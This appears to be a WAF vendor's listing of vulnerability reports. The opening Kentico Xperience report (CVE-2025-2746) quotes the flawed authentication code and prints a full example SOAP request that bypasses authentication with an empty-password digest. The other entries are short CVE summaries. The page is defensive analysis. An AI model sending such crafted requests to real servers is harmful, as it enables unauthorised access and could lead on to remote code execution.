2025.06 – Kentico Xperience CMS Authentication Bypass The vulnerability is an authentication bypass vulnerability in the Kentico Xperience CMS platform, which could allow an attacker to attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx. The vulnerability was patched in Kentico Xperience CMS platform version 13.0.178, and AIWAF responded by adding patterns to detect these vulnerabilities in a May 2025 pattern update.   1. Overview Xperience CMS is a digital marketing platform provided by Kentico, which is an integrated system platform that includes content management services, digital marketing, e-commerce management, and more. This report summarizes our analysis of CVE-2025-2746 and CVE-2025-2747, the authentication bypass and RCE vulnerabilities recently discovered in the platform. Source : https://en.wikipedia.org/wiki/Kentico_Xperience   2. Attack type CVE-2025-2746 is an authentication bypass vulnerability that leverages a vulnerable authentication system in certain endpoints of Kentico’s Xperience CMS platform. According to watchtowr, who analyzed the vulnerability, an attacker can attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx, by exploiting the return of the password hash value as an empty string when an invalid username is entered during the authentication process. protected override string AuthenticateToken(UsernameToken token) { if (token == null) { throw new ArgumentNullException(“[WebServiceAuthorization.AuthenticateToken]: Missing username authentication token.”); } AbstractStockHelper<RequestStockHelper>.Add(“AUTH_PROCESSED”, true, false); string value = SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + “.CMSStagingServiceUsername”); string text = EncryptionHelper.DecryptData(SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + “.CMSStagingServicePassword”)); if (string.IsNullOrEmpty(text)) { throw new SecurityException(“[WebServiceAuthorization.AuthenticateToken]: Staging does not work with blank password. Set a password on the target server.”); } if (value == token.Username) { return StagingTaskRunner.GetSHA1Hash(text); } return “”; } Source : https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/   An attacker can bypass the authentication process by selecting the hash-based password verification mode, sending a SOAP request with a SHA1 hash code in the form of an empty string password, and, in conjunction with the vulnerability, leverage the internal API after authentication to attempt an RCE attack.   Example attack Request :   POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1 Host: www.test.com Content-Type: text/xml; charset=utf-8 Content-Length: 1095 SOAPAction: “<http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData>” <soap:Envelope xmlns:xsi=”<http://www.w3.org/2001/XMLSchema-instance>” xmlns:xsd=”<http://www.w3.org/2001/XMLSchema>” xmlns:soap=”<http://schemas.xmlsoap.org/soap/envelope/>”> <soap:Header> <wsse:Security xmlns:wsse=”<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd>” xmlns:wsu=”<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd>”> <wsse:UsernameToken> <wsse:Username>hacker</wsse:Username> <wsse:Password Type=”<http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest>”>OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password> <wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce> <wsu:Created>2025-05-013T014:54:17Z</wsu:Created> </wsse:UsernameToken> </wsse:Security> </soap:Header> <soap:Body> <ProcessSynchronizationTaskData xmlns=”<http://localhost/SyncWebService/SyncServer>”> <stagingTaskData><![CDATA[<hacker>]]></stagingTaskData> Read more about [2025.06 Vulnerability Report] Kentico Xperience CMS Authentication Bypass[…]

[2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution This is an RCE vulnerability in the Ingress NGINX controller that could allow an attacker to attempt to execute malicious commands by sending an AdmissionReview request with a crafted, temporary NGINX configuration template. This vulnerability was patched in Ingress NGINX Controller versions 1.12.1, 1.11.5, and Read more about [2025.05 Vulnerability Report] Kubernetes Ingress NGINX Controller Remote Code Execution[…]

[2025.04 Vulnerability Report] FOXCMS Qianhu Remote Code Execution(CVE-2025-29306) CVE-2025-29306 is a vulnerability that can pose a serious security threat to organizations using FoxCMS. An attacker can exploit this vulnerability to gain complete control of the system, which can result in data leakage, service interruption, etc. Therefore, prompt patching and security enhancement measures are required for Read more about [2025.04 Vulnerability Report] FOXCMS Qianhu Remote Code Execution(CVE-2025-29306)[…]

[2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813) Apache Tomcat is a Java-based web application server widely used worldwide, and recently discovered a serious path equivalence vulnerability identified as CVE-2025-24813. This vulnerability poses a risk that an attacker can access restricted resources or execute arbitrary code without authentication due to a path validation error in Read more about [2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813)[…]

[2025.04 Vulnerability Report] Next.js Middleware Authentication Bypass The vulnerability is an authentication bypass vulnerability in Next.js, which allows an attacker to bypass access control for the API by sending the request by entering the middleware path in the x-middleware-request header or entering it to satisfy the recursive condition. The vulnerabilities were patched in Next.js versions Read more about [2025.04 Vulnerability Report] Next.js Middleware Authentication Bypass[…]

[2025.03 Vulnerability Report] HUNK COMPANION Plugin Remote Code Execution (CVE-2024-9707) This major vulnerability in the Hunk Companion plugin could be the first step in a broader exploit chain. If another plugin with a known vulnerability is activated via this vulnerability, an attacker could achieve remote code execution on the WordPress site. The widespread distribution of Read more about [2025.03 Vulnerability Report] HUNK COMPANION Plugin Remote Code Execution (CVE-2024-9707)[…]

[2025.03 Vulnerability Report] Ivanti vTM Authentication Bypass The vulnerability is an authentication bypass vulnerability in IvantivTM, which allows an attacker to create an arbitrary administrator account by bypassing access control to the loadable wizard.cgi for all sections within the web interface. The vulnerability has been patched in IvantivTM versions 22.2R1, 22.7R2, and others, and AIWAF responds Read more about [2025.03 Vulnerability Report] Ivanti vTM Authentication Bypass[…]

CVE-2024-4547 is a SQL injection vulnerability affecting Delta Electronics DIAEnergie v1.10.1.8610 and earlier. The issue lies in the CEBC.exe component that processes the ‘RecalculateScript’ message, which contains four fields separated by the ‘~’ character. An unauthenticated remote attacker could exploit this vulnerability by manipulating the fourth field to inject malicious SQL statements, which could lead Read more about [2025.02 Vulnerability Report] Delta Electronics DIAEnergie SQL Injection(CVE-2024-4547)[…]

The vulnerability is a pre-authentication RCE vulnerability in Apache OFBiz, which allows an attacker to execute malicious code without an authentication process by exploiting an incorrect authentication process when processing a request for a particular URL. The vulnerability was patched in version 18.12.15 of Apache OFBiz, and AIWAF responds through the 2228: Apache OFBiz Remote Read more about [2025.02 Vulnerability Report] Apache OFbiz Pre-Auth Remote Code Execution[…]

The vulnerability is a pre-authenticated RCE vulnerability in Ivanti’s Connect Secure, Policy Secure, and ZTA Gateway products, which attempts to exploit Buffer Overflow during IF-T/TLS protocol communication. The vulnerability is patched in 22.7R2.5 for Ivanti Connect Secure and Ivanti ZTA Gateway products, and AIWAF is continuously monitoring related vulnerabilities. 1. Overview Ivanti’s Connect Secure, Policy Read more about [2025.01 Vulnerability Report] Ivanti Connect Secure & Policy Secure, ZTA Gateways Vulnerability[…]